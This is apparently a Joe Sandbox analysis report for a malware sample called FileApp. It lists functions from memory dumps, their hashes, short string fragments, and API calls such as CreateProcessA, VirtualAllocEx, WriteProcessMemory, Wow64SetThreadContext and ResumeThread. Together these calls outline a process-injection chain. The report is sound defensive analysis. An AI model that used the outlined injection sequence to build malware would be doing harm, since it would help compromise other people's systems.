H, xrefs: 05910CAF

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $!$$$&$'$'$($)$-$-$-$.$.$.$/kB$4$4$8$8$8$8$9A>B$:$=$>$?$@dgB$A$B$B$C$D$D$D$E$E$G$H$I$IyB$K$M$P$P$P$Q$S$T$T$V$W$W$Y$YQ3B$[$[7sB$_$a$a$l?g@$2\@
API String ID: 0-1098073836
Opcode ID: ff9a6fb9c1584042695d7bd5443ab87046d82178be334f50d5ad5be43776034b
Instruction ID: 58b22b8aac656cfe449f82c7e0f40c6283e80c8c201a9fb2039f3a3fec449453
Opcode Fuzzy Hash: ff9a6fb9c1584042695d7bd5443ab87046d82178be334f50d5ad5be43776034b
Instruction Fuzzy Hash: C4B280B4E05A29DFDB64CF29DE4479ABBB5FB49301F00A1EA940CA7250D77A5E84CF04

Function 05817030 Relevance: 2.6, Instructions: 2608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e00cd9e0ee606cca94d65c39c2c78d6bad06748726f1894f23af2be2ea75d210
Instruction ID: ae77cb531c11641ae172ab8257535c4f6627f57ddf4e2c86f36b5688e4b682a1
Opcode Fuzzy Hash: e00cd9e0ee606cca94d65c39c2c78d6bad06748726f1894f23af2be2ea75d210
Instruction Fuzzy Hash: 6353D474A01219CFDB24DF68C898A9DB7B6BF89310F158599E819EB361DB30ED81CF44

Function 05816158 Relevance: .7, Instructions: 722COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74abc5d015e94711b920f1a7d012fd790d257dc1bd9aded0937c15385a8bb9e5
Instruction ID: 84c3bc3f140c8859d5256d027fe24d8468ac62f58e8f35b660c363682b3c9a69
Opcode Fuzzy Hash: 74abc5d015e94711b920f1a7d012fd790d257dc1bd9aded0937c15385a8bb9e5
Instruction Fuzzy Hash: 3C527034B00115DFDB18DF6AD484AADBBB6BF88310B158169ED46EB760EB31EC41CB94

Function 059113C8 Relevance: 11.0, Strings: 8, Instructions: 1003
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

IyB, xrefs: 05912330
9A>B, xrefs: 059124FC
2\@, xrefs: 059121C6
YQ3B, xrefs: 05911D9A
[7sB, xrefs: 0591236B
l?g@, xrefs: 05912323
/kB, xrefs: 0591210A
@dgB, xrefs: 05911718

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: /kB$9A>B$@dgB$IyB$YQ3B$[7sB$l?g@$2\@
API String ID: 0-676414525
Opcode ID: de00453d08dc44149b6ba26f9b335fde52a3935492a09a966de21196f3714371
Instruction ID: a78bb896f8bbe5c6a45b25ca32fc778b318b0d0329be635b77fc850ab478f174
Opcode Fuzzy Hash: de00453d08dc44149b6ba26f9b335fde52a3935492a09a966de21196f3714371
Instruction Fuzzy Hash: CDD2B5B4A0024ADFDB01CF58D589FEEBFB1FB45314F0592A8DA046B362C775A985CB90

Function 059113D8 Relevance: 11.0, Strings: 8, Instructions: 980
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

IyB, xrefs: 05912330
9A>B, xrefs: 059124FC
2\@, xrefs: 059121C6
YQ3B, xrefs: 05911D9A
[7sB, xrefs: 0591236B
l?g@, xrefs: 05912323
/kB, xrefs: 0591210A
@dgB, xrefs: 05911718

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: /kB$9A>B$@dgB$IyB$YQ3B$[7sB$l?g@$2\@
API String ID: 0-676414525
Opcode ID: ae72d965f8acadc9cca6be81d8dd78fb9b9be67699a12f01df3b3a0e4a090e9b
Instruction ID: bd35fec7c2f945df7e3e3bd7be6eb1ae1dd0326f867359bf75cc3e7431ff1ee0
Opcode Fuzzy Hash: ae72d965f8acadc9cca6be81d8dd78fb9b9be67699a12f01df3b3a0e4a090e9b
Instruction Fuzzy Hash: 85D2B5B4A0024ADFDB01CF58D589FEEBFB1FB45314F0592A8DA046B362C775A985CB90

Function 0581F6B4 Relevance: 2.1, APIs: 1, Instructions: 597threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0581FB77

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 63460b08dee384e94e5d491fdb45b2c998ef9193c5919ab7fef7c3d4605862f4
Instruction ID: 5c04bae75350f1953a0d0cff062f6dabf275a6c63cbd7107fe705d75a5c04317
Opcode Fuzzy Hash: 63460b08dee384e94e5d491fdb45b2c998ef9193c5919ab7fef7c3d4605862f4
Instruction Fuzzy Hash: 7F510375C053988FEB01DFA9D890ADEBFF0BF49310F14809AD455AB251C7789949CF68

Function 05220006 Relevance: 1.8, APIs: 1, Instructions: 338processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05220307

Memory Dump Source

Source File: 00000000.00000002.2129322660.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_FileApp.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 240370543766eec9d6642fee20c0fbed7169e0d04c2ccc771ba5e0543b24b399
Instruction ID: 268918fbaa1c7af8e2c1a5389390d8d4adc3c6b892921254bc2728e3cedc580a
Opcode Fuzzy Hash: 240370543766eec9d6642fee20c0fbed7169e0d04c2ccc771ba5e0543b24b399
Instruction Fuzzy Hash: E0D14574D0026E9FDB25CFA8C845BEDBBB1BF09300F0095AAE449B7250DB749A85CF95

Function 05220040 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05220307

Memory Dump Source

Source File: 00000000.00000002.2129322660.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_FileApp.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f6dc8b84923e98019e68aa1ff68a72a5fd1e4b6c8a2bcbde8c2faa63f19b0e85
Instruction ID: e2f46a1e27c790f6dda7d8afbce6798bcfc9c99479f3629dfa7c8ccaca04290e
Opcode Fuzzy Hash: f6dc8b84923e98019e68aa1ff68a72a5fd1e4b6c8a2bcbde8c2faa63f19b0e85
Instruction Fuzzy Hash: 79C11474D0022E9FDB24CFA8C845BEDBBB1BF49300F1095AAD849B7250DB749A85CF95

Function 0581FD0A Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0581FDE3

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: debf3b7a134b877d2efd0b71914461b0aa83cd0da5a24301db482ad89b8137ce
Instruction ID: ebeba01197b698dbf72586b5bbf973a56ead91d63cb0e51d2af0b394665a7925
Opcode Fuzzy Hash: debf3b7a134b877d2efd0b71914461b0aa83cd0da5a24301db482ad89b8137ce
Instruction Fuzzy Hash: CB41BBB5D012498FDF00CFA9D984AEEFBF1BB48310F20942AE914B7200D734AA45CF68

Function 0581FD10 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0581FDE3

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 51abce6b975dd08974070c28cc8c0b7cf2743cc05510a76dbe861cfaa55751fd
Instruction ID: 25c362881601dabaed56196f876679e25a1ecd20dc3693f4965088c33108710a
Opcode Fuzzy Hash: 51abce6b975dd08974070c28cc8c0b7cf2743cc05510a76dbe861cfaa55751fd
Instruction Fuzzy Hash: 4541BCB5D012599FDF00CFA9D984AEEFBF1BB49310F10902AE915B7200D775AA45CF68

Function 0581FE60 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0581FF1A

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4efdce4e441d4316d543c9b1cabacca4e65441d3fff4d1e05bca514b0bcbfd4f
Instruction ID: 497985d0856950885b75ef998937e98418dd4ccbbe115d4083bed234cb09ac05
Opcode Fuzzy Hash: 4efdce4e441d4316d543c9b1cabacca4e65441d3fff4d1e05bca514b0bcbfd4f
Instruction Fuzzy Hash: 1841A8B9D042989FDF10CFA9D880AEEBBB1BB49310F14902AE915B7200C775A945CF68

Function 0581FE68 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0581FF1A

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0f7706d9b194fdcbe1ec79214660d2bc320ef6e3866fe39f88b7d021c29946fc
Instruction ID: eec203f5bb985c1e36ecd38181f26efe94df7e8ff610ec61859a71440b5b3787
Opcode Fuzzy Hash: 0f7706d9b194fdcbe1ec79214660d2bc320ef6e3866fe39f88b7d021c29946fc
Instruction Fuzzy Hash: 8841B8B5D04258DFCF00CFAAD880AEEFBB1BB49310F10902AE915B7200D775A945CF68

Function 0581FBE8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0581FC9A

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 16ad7fef436c4be289459fdcbc98e645d5a18a663e1bd714b7265c32f1050571
Instruction ID: 45e4ed6ecc1b21b02e30c1bb2cac2c1934d6defc5568aec0a28989b1d343d57f
Opcode Fuzzy Hash: 16ad7fef436c4be289459fdcbc98e645d5a18a663e1bd714b7265c32f1050571
Instruction Fuzzy Hash: F33195B9D00259DFDF10CFA9D981ADEFBB1BB49310F10A42AE915B7200D735A905CF68

Function 0581FBF0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0581FC9A

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 05d5e3ea4d0fcea76b48daaaf9471fb9a328eeb1dc69bd65161cc9eae6a741a5
Instruction ID: a409fd3726229ea4b157e45c514cf1136f15d31a3b046264f227dc4343a9d83d
Opcode Fuzzy Hash: 05d5e3ea4d0fcea76b48daaaf9471fb9a328eeb1dc69bd65161cc9eae6a741a5
Instruction Fuzzy Hash: D631A6B9D00259DFDF10CFA9D980ADEFBB5BB49310F10A42AE915B7200D775A905CF68

Function 0581FAC8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0581FB77

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2bde95c7a8c366c14c2e1849309e5a29045c52e97d91724319b2a2ffd69788b0
Instruction ID: e9cc40da74f6ab7afb782b7addb965d2af6e77b439180a859dcb172726ac1ca6
Opcode Fuzzy Hash: 2bde95c7a8c366c14c2e1849309e5a29045c52e97d91724319b2a2ffd69788b0
Instruction Fuzzy Hash: 6D31CBB4D00258DFDB10CFAAD984AEEBBF1BF48310F14802AE819B7240D778A945CF64

Function 0581F5D2 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0581F656

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f2c1ca960b1da32f13160c5bbcdffbd773da7492f2327acf986ae466a1477dfd
Instruction ID: ccdfece2fb7b3ba7b9c790520900d46e501305d4a88d850a75b3fa95fde0db5e
Opcode Fuzzy Hash: f2c1ca960b1da32f13160c5bbcdffbd773da7492f2327acf986ae466a1477dfd
Instruction Fuzzy Hash: F531DAB4D012089FDB14CFA9D981A9EFBB4BF48320F10942AE915B7310CB34A901CF68

Function 0581F5D8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0581F656

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e12e41f586e25864b640c9bf6d2c8f27d1cec0b7a2f22cc1d738a5dcd2bd9f58
Instruction ID: 09918479d8417835b63780dce0ed89922086e294c642de8615e9fc121f97d9d7
Opcode Fuzzy Hash: e12e41f586e25864b640c9bf6d2c8f27d1cec0b7a2f22cc1d738a5dcd2bd9f58
Instruction Fuzzy Hash: 2E31CCB4D012589FDF14CFA9D881A9EFBB4BF48310F10942AE915B7310D775A901CFA8

Function 030A2658 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

I, xrefs: 030A26D3

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 99e0ccccd3ffdaf9df03268c642b3a40631a07925bc65b0642ffbc1be2c73123
Instruction ID: a245369e89794fe56ec39b38152dae146c0ae5ddc864c9b5fc377cd6ff32cc4d
Opcode Fuzzy Hash: 99e0ccccd3ffdaf9df03268c642b3a40631a07925bc65b0642ffbc1be2c73123
Instruction Fuzzy Hash: D5014978A05628CFCB60DF28E890ADAB7B1AB85302F4054EAD50EA7240D7345ED1CF84

Function 030A7355 Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

!, xrefs: 030A7370

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: e0626a491b15ee228ff6caa6a04fc4a1593501faa646ca89a82c299432b898cd
Instruction ID: 108236c3f7da1560ffc09a78d5e390ff5e169932fe701c6d730eac83f61142be
Opcode Fuzzy Hash: e0626a491b15ee228ff6caa6a04fc4a1593501faa646ca89a82c299432b898cd
Instruction Fuzzy Hash: 6AD002B4D05519CFCB60DF68D9447DDBBF1EF95305F0050D6941AB6240EB784D849F11

Function 05918EAA Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fbd495d3d2e473b30948a14d03113ca2a6319e44e6b94bf3984f71ca974e005
Instruction ID: 33c43cfa6aff94402865e0f9c08e116837e7451acdab1e1bdd4dc03e919b7eeb
Opcode Fuzzy Hash: 1fbd495d3d2e473b30948a14d03113ca2a6319e44e6b94bf3984f71ca974e005
Instruction Fuzzy Hash: 49A18074E10228CFEB14DFA4D859BADBBBAFB84305F10819AE919A7351CB711E84CF01

Function 030A29B1 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42522a1204d3beb866609117c953752f615065635d2130cabddf582bf6f96396
Instruction ID: b83eb82be9d91bdc5bb462d0a547ebd290b947591d2fb000b18f4657a2050c77
Opcode Fuzzy Hash: 42522a1204d3beb866609117c953752f615065635d2130cabddf582bf6f96396
Instruction Fuzzy Hash: E3517D78D0122ACFCB64DF24D9946E9BBB1FF89345F0010EAD41EA7261EB345E848F51

Function 0591294F Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf97c0c0e2eb0c0b0002a6a2d50bc654f4b2d7f196bcc065e675ba283038028e
Instruction ID: 934e5a47519d063a09d5f901cdc3eec428bfe357406e9f9b963cdd34aacc75bf
Opcode Fuzzy Hash: bf97c0c0e2eb0c0b0002a6a2d50bc654f4b2d7f196bcc065e675ba283038028e
Instruction Fuzzy Hash: BA419E74E01219CFDB18DFAAD5809EEBBF2BF89300F14806AE815B7360DB359941CB54

Function 05912960 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d2ada747e61e510129c718dd6f3369a4418ada2e0f96b77a351fba5c8191be0
Instruction ID: ce02d03bad50bce28729c320d5e89c7e44bebea2e8d1888bc8fa041b44ab80f7
Opcode Fuzzy Hash: 6d2ada747e61e510129c718dd6f3369a4418ada2e0f96b77a351fba5c8191be0
Instruction Fuzzy Hash: 73418B74E01219DFDB18DFAAD5849AEBBF2BF89300F14806AE815B7360DB35A941CB54

Function 0591FDB8 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db860e324d1789d63b2ebe84cce9e8b8ec11cc006d739999f623a0204d87fe83
Instruction ID: 333b7f8572beaea266cbf6cc3ff263cb61be38b8d2b71cbaf34b1039b6ca058f
Opcode Fuzzy Hash: db860e324d1789d63b2ebe84cce9e8b8ec11cc006d739999f623a0204d87fe83
Instruction Fuzzy Hash: B531B274E0521D9FCB05DFA9D494AEEBBB5BF88310F049429E905A7360DB70A941CFA8

Function 0591FDAA Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0290e7ca74011f0d6e4a8286607b89922b429361b43788a8dec983ad02d2c100
Instruction ID: 9424d81527aa7052043cb1c849ce21c2d035cc82ab0254e1a53920632eadfe89
Opcode Fuzzy Hash: 0290e7ca74011f0d6e4a8286607b89922b429361b43788a8dec983ad02d2c100
Instruction Fuzzy Hash: 2931F474E0521DCFCB05CFA8D484AEDBBF5AF48310F10946AE805AB360DB70A944CFA4

Function 0591940A Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 431256d7c24fda9b23cdee4922c64f36c2d8d6b7b9c298e0a61521dfc21d0507
Instruction ID: 2c44c27a6604a16156147461fcd1b92b0ca2969fd983a6a59fab9c43e76fdbd2
Opcode Fuzzy Hash: 431256d7c24fda9b23cdee4922c64f36c2d8d6b7b9c298e0a61521dfc21d0507
Instruction Fuzzy Hash: D8312670A00269CFEB21DF68E988A89BBF5FB05310F0491D9E848A7251DB759E81CF14

Function 030A6395 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497cf143d1dd4d37771fd669ddd5c34b9cc2450aba80c09ed6b9830b26c3b9fc
Instruction ID: c371e57be68ec736dce18fafef83639e139bd2a10d38542fd675f8c72a1cf324
Opcode Fuzzy Hash: 497cf143d1dd4d37771fd669ddd5c34b9cc2450aba80c09ed6b9830b26c3b9fc
Instruction Fuzzy Hash: EC017E78D09228CFCB24DF20DD84AD9BBB1FF49301F4061EAE54AA2A58E7341F808F01

Function 05919630 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5799844742fece1adb98573dd480137ea02fcb7da0d1bbcb3d83d56e85c53d1
Instruction ID: 1a6fbd59427bb9fb03ee87592175242f33e475ee28b7328e47abbe91611e7e07
Opcode Fuzzy Hash: d5799844742fece1adb98573dd480137ea02fcb7da0d1bbcb3d83d56e85c53d1
Instruction Fuzzy Hash: 50F0F870E152589FEB80DFA9D55A79EBBF9AF44244F0081A9D808D3250EB749A40CF14

Function 05919620 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d2d55218191acb28506d9be7165eda3cf2b64c829fddeaea8b6c4a3cb522e5
Instruction ID: e756d3a3f54bfaf627602303b5a1c51b8f3be6f05fb8c14a71aad65cc54f93d4
Opcode Fuzzy Hash: 65d2d55218191acb28506d9be7165eda3cf2b64c829fddeaea8b6c4a3cb522e5
Instruction Fuzzy Hash: B6F0EC30949284DFDB51CF74C457A987BF4EB03350B1002EAD854C7391DB359901CB11

Function 05918E46 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5337ef6c10fed1295e382e9f4cebd0b683b0c4d7e56378684bb2dfc2f01a923
Instruction ID: 6b8f9571353a5d2d17d0bc3fbf5d04bc709cbe1fccabe9250d528ad787d14351
Opcode Fuzzy Hash: e5337ef6c10fed1295e382e9f4cebd0b683b0c4d7e56378684bb2dfc2f01a923
Instruction Fuzzy Hash: E6F06D70A01268CFEB50DF28E288B8DBBF6FB14300F149695E848A7211C7B5AD80CF08

Function 030ADB00 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 819d8fba4c32755c1a439ac1702c63de9bce7ca64880ba1c39835743c6fc99aa
Instruction ID: d8b1b93b0a6d62785dadb12e57fdc78f22c80156f1d1872eef7e277b061c039c
Opcode Fuzzy Hash: 819d8fba4c32755c1a439ac1702c63de9bce7ca64880ba1c39835743c6fc99aa
Instruction Fuzzy Hash: D7F0AE79E05208EFCB84DFA8E444A9DBBF4FF48310F5081A9E818A7320D7719A54EF91

Function 05919243 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d68a3a430276e0d2830e516e87fdd99dbad825a2bea8e09a5e70706ae148f268
Instruction ID: 20a54b503c8e0e5da463d3a8a249da9b742147a94db681cfa11e69af9b46fb6a
Opcode Fuzzy Hash: d68a3a430276e0d2830e516e87fdd99dbad825a2bea8e09a5e70706ae148f268
Instruction Fuzzy Hash: 57F01770E01219CFEB50DF18E648B89BBF9FB40304F059594E908AB250C7B59D81CF44

Function 030A296B Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695135a24f04420987ec24c3a93b1c712783cf389fe92da57d6034dacae78682
Instruction ID: 6b0681b0da2a099fc60443776d87d128da9f5c6bddb808471565cd0bf41942db
Opcode Fuzzy Hash: 695135a24f04420987ec24c3a93b1c712783cf389fe92da57d6034dacae78682
Instruction Fuzzy Hash: 55E0E574906A29CBCB60DF58EC44BEEB6B1BB41342F4018E9D10ABB2C0E7741E859F44

Non-executed Functions

Function 05914F10 Relevance: 84.7, Strings: 67, Instructions: 974COMMON

Download Yara Rule

Strings

P, xrefs: 05915801
;, xrefs: 05915453
$, xrefs: 05915141
^, xrefs: 05915C8D
Z, xrefs: 0591557F
?, xrefs: 05915613
', xrefs: 05915E0B
, xrefs: 059154F7
_, xrefs: 05915DE7
A, xrefs: 05915469
:, xrefs: 05915493
(fB, xrefs: 05915CF7
T, xrefs: 05915655
B, xrefs: 05915E43
2, xrefs: 059158D1
Z, xrefs: 05915A6F
Z, xrefs: 0591597F
!, xrefs: 059151AD
!, xrefs: 05915391
,, xrefs: 059152FD
L, xrefs: 059151A3
@, xrefs: 05915130
6, xrefs: 05915DA5
M, xrefs: 05915CB3
Q, xrefs: 05915D67
1, xrefs: 05915A07
>, xrefs: 0591566F
*, xrefs: 05915DBF
